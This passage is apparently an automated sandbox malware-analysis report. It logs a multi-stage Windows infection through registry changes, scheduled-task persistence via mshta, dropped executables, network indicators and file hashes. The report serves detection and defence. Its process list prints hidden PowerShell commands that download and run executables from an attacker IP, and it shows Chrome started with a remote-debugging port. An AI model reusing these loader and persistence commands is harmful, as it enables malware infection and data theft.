| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\Temp\1091749001\2d2018b2b5.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Temp\1091749001\2d2018b2b5.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1091693101\f87af9d1cb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1091693101\f87af9d1cb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1091693101\f87af9d1cb.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe
"C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe"
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe
"C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe"
C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
"C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe"
C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
"C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1452 -s 68
C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe
"C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe"
C:\Users\Admin\AppData\Local\Temp\1091693101\f87af9d1cb.exe
"C:\Users\Admin\AppData\Local\Temp\1091693101\f87af9d1cb.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn jIzd4maWSGR /tr "mshta C:\Users\Admin\AppData\Local\Temp\XIny8bdjV.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\XIny8bdjV.hta
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn jIzd4maWSGR /tr "mshta C:\Users\Admin\AppData\Local\Temp\XIny8bdjV.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'BEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\1091694021\am_no.cmd" "
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1091694021\am_no.cmd" any_word
C:\Windows\SysWOW64\timeout.exe
timeout /t 2
C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE
"C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6849758,0x7fef6849768,0x7fef6849778
C:\Windows\system32\ctfmon.exe
ctfmon.exe
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "6fLQXma4qrZ" /tr "mshta \"C:\Temp\My6dz0IVO.hta\"" /sc minute /mo 25 /ru "Admin" /f
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1100 --field-trial-handle=1840,i,15450408259808483725,12150644784737290761,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1380 --field-trial-handle=1840,i,15450408259808483725,12150644784737290761,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1464 --field-trial-handle=1840,i,15450408259808483725,12150644784737290761,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=1868 --field-trial-handle=1840,i,15450408259808483725,12150644784737290761,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2088 --field-trial-handle=1840,i,15450408259808483725,12150644784737290761,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Windows\SysWOW64\mshta.exe
mshta "C:\Temp\My6dz0IVO.hta"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=2452 --field-trial-handle=1840,i,15450408259808483725,12150644784737290761,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1300 --field-trial-handle=1840,i,15450408259808483725,12150644784737290761,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3516 --field-trial-handle=1840,i,15450408259808483725,12150644784737290761,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3636 --field-trial-handle=1840,i,15450408259808483725,12150644784737290761,131072 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe
"C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe"
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3624 --field-trial-handle=1840,i,15450408259808483725,12150644784737290761,131072 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe
"C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe"
C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe
"C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe"
C:\Windows\system32\taskeng.exe
taskeng.exe {ED4AE890-6A52-4F3B-8F30-ACF88E571A55} S-1-5-21-4177215427-74451935-3209572229-1000:JSMURNPT\Admin:Interactive:[1]
C:\ProgramData\omlnpw\uxek.exe
C:\ProgramData\omlnpw\uxek.exe
C:\Users\Admin\AppData\Local\Temp\1091744001\ada8778c42.exe
"C:\Users\Admin\AppData\Local\Temp\1091744001\ada8778c42.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\ym7yu" & exit
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Users\Admin\AppData\Local\Temp\1091745001\6ab70434ce.exe
"C:\Users\Admin\AppData\Local\Temp\1091745001\6ab70434ce.exe"
C:\Users\Admin\AppData\Local\Temp\1091746001\4c45c2eaab.exe
"C:\Users\Admin\AppData\Local\Temp\1091746001\4c45c2eaab.exe"
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Users\Admin\AppData\Local\Temp\1091747001\9390d52627.exe
"C:\Users\Admin\AppData\Local\Temp\1091747001\9390d52627.exe"
C:\Users\Admin\AppData\Local\Temp\1091749001\2d2018b2b5.exe
"C:\Users\Admin\AppData\Local\Temp\1091749001\2d2018b2b5.exe"
C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe
"C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe"
C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe
"C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 880 -s 68
C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe
"C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe"
C:\Users\Admin\AppData\Local\Temp\1091753001\HsDTj78.exe
"C:\Users\Admin\AppData\Local\Temp\1091753001\HsDTj78.exe"
C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe
"C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe"
Network
| Country | Destination | Domain | Proto |
| RU | 185.215.113.43:80 | 185.215.113.43 | tcp |
| RU | 185.215.113.75:80 | 185.215.113.75 | tcp |
| US | 8.8.8.8:53 | advertised.life | udp |
| US | 104.21.94.161:443 | advertised.life | tcp |
| US | 8.8.8.8:53 | uncertainyelemz.bet | udp |
| US | 104.21.16.1:443 | uncertainyelemz.bet | tcp |
| US | 104.21.16.1:443 | uncertainyelemz.bet | tcp |
| US | 104.21.16.1:443 | uncertainyelemz.bet | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| FI | 65.109.226.203:443 | 65.109.226.203 | tcp |
| FI | 65.109.226.203:443 | 65.109.226.203 | tcp |
| FI | 65.109.226.203:443 | 65.109.226.203 | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| FI | 65.109.226.203:443 | 65.109.226.203 | tcp |
| FI | 65.109.226.203:443 | 65.109.226.203 | tcp |
| FI | 65.109.226.203:443 | 65.109.226.203 | tcp |
| FI | 65.109.226.203:443 | 65.109.226.203 | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.200.4:443 | www.google.com | tcp |
| GB | 142.250.200.4:443 | www.google.com | tcp |
| GB | 142.250.200.4:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | ogads-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 142.250.200.14:443 | apis.google.com | tcp |
| GB | 216.58.213.10:443 | ogads-pa.googleapis.com | tcp |
| GB | 216.58.213.10:443 | ogads-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.178.14:443 | play.google.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 142.250.178.14:443 | play.google.com | udp |
| FI | 65.109.226.203:443 | 65.109.226.203 | tcp |
| US | 8.8.8.8:53 | cobolrationumelawrtewarms.com | udp |
| FI | 65.109.226.203:443 | 65.109.226.203 | tcp |
| NL | 185.198.234.185:80 | cobolrationumelawrtewarms.com | tcp |
| FI | 65.109.226.203:443 | 65.109.226.203 | tcp |
| FI | 65.109.226.203:443 | 65.109.226.203 | tcp |
| FI | 65.109.226.203:443 | 65.109.226.203 | tcp |
| DE | 104.194.157.122:80 | 104.194.157.122 | tcp |
| FI | 65.109.226.203:443 | 65.109.226.203 | tcp |
| US | 8.8.8.8:53 | pirtyoffensiz.bet | udp |
| US | 172.67.198.28:443 | pirtyoffensiz.bet | tcp |
| US | 104.21.16.1:443 | uncertainyelemz.bet | tcp |
| FI | 65.109.226.203:443 | 65.109.226.203 | tcp |
| US | 104.21.16.1:443 | uncertainyelemz.bet | tcp |
| US | 104.21.16.1:443 | uncertainyelemz.bet | tcp |
| FI | 65.109.226.203:443 | 65.109.226.203 | tcp |
| FI | 65.109.226.203:443 | 65.109.226.203 | tcp |
| FI | 65.109.226.203:443 | 65.109.226.203 | tcp |
| N/A | 127.0.0.1:9223 | tcp | |
| N/A | 127.0.0.1:9223 | tcp | |
| FI | 65.109.226.203:443 | 65.109.226.203 | tcp |
| FI | 65.109.226.203:443 | 65.109.226.203 | tcp |
| FI | 65.109.226.203:443 | 65.109.226.203 | tcp |
| NL | 185.156.73.73:80 | 185.156.73.73 | tcp |
| US | 8.8.8.8:53 | investiigato.website | udp |
| US | 104.21.16.1:443 | uncertainyelemz.bet | tcp |
| US | 104.21.16.1:443 | uncertainyelemz.bet | tcp |
| US | 104.21.16.1:443 | uncertainyelemz.bet | tcp |
| NL | 185.156.73.73:80 | 185.156.73.73 | tcp |
| US | 8.8.8.8:53 | towerbingobongoboom.com | udp |
| DE | 93.186.202.3:4000 | towerbingobongoboom.com | tcp |
| US | 104.21.94.161:443 | advertised.life | tcp |
| US | 104.21.16.1:443 | uncertainyelemz.bet | tcp |
| US | 104.21.16.1:443 | uncertainyelemz.bet | tcp |
| US | 104.21.16.1:443 | uncertainyelemz.bet | tcp |
| US | 172.67.198.28:443 | pirtyoffensiz.bet | tcp |
| US | 8.8.8.8:53 | breakfasutwy.cyou | udp |
| US | 8.8.8.8:53 | importenptoc.com | udp |
| US | 104.21.16.1:443 | uncertainyelemz.bet | tcp |
| US | 8.8.8.8:53 | voicesharped.com | udp |
| US | 8.8.8.8:53 | inputrreparnt.com | udp |
| US | 8.8.8.8:53 | torpdidebar.com | udp |
| US | 104.21.16.1:443 | uncertainyelemz.bet | tcp |
| US | 104.21.16.1:443 | uncertainyelemz.bet | tcp |
| US | 8.8.8.8:53 | rebeldettern.com | udp |
| US | 8.8.8.8:53 | actiothreaz.com | udp |
| US | 8.8.8.8:53 | garulouscuto.com | udp |
| US | 8.8.8.8:53 | breedertremnd.com | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | outlinedtrai.bet | udp |
| US | 172.67.218.33:443 | outlinedtrai.bet | tcp |
Files
memory/2348-0-0x0000000000220000-0x00000000006F0000-memory.dmp
memory/2348-1-0x0000000077BA0000-0x0000000077BA2000-memory.dmp
memory/2348-2-0x0000000000221000-0x0000000000289000-memory.dmp
memory/2348-3-0x0000000000220000-0x00000000006F0000-memory.dmp
memory/2348-4-0x0000000000220000-0x00000000006F0000-memory.dmp
\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
| MD5 | a3ec4b44e7677c12a76bf51f45480133 |
| SHA1 | 15587b7a0420115e979461490689a79beca64118 |
| SHA256 | 97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2 |
| SHA512 | 4d1dfb16076f0fd17c2d6a0bfe221af69dda9bf7e75f82a13f64e5bd732ff56e7f42b36864b0e07c3ae78bcb459124e700640e03ba0a416121ae7146ea4bf075 |
memory/2680-20-0x0000000000FE0000-0x00000000014B0000-memory.dmp
memory/2348-18-0x0000000006FF0000-0x00000000074C0000-memory.dmp
memory/2348-21-0x0000000000221000-0x0000000000289000-memory.dmp
memory/2348-17-0x0000000000220000-0x00000000006F0000-memory.dmp
memory/2680-22-0x0000000000FE1000-0x0000000001049000-memory.dmp
memory/2680-23-0x0000000000FE0000-0x00000000014B0000-memory.dmp
memory/2680-25-0x0000000000FE0000-0x00000000014B0000-memory.dmp
memory/2680-26-0x0000000000FE0000-0x00000000014B0000-memory.dmp
memory/2680-27-0x0000000000FE0000-0x00000000014B0000-memory.dmp
memory/2680-29-0x0000000000FE1000-0x0000000001049000-memory.dmp
memory/2680-28-0x0000000000FE0000-0x00000000014B0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe
| MD5 | 515748a93ce7beb3f4416ec66ba8488e |
| SHA1 | 3ba2f1a56dcc91967361622c56b1ba545cda4325 |
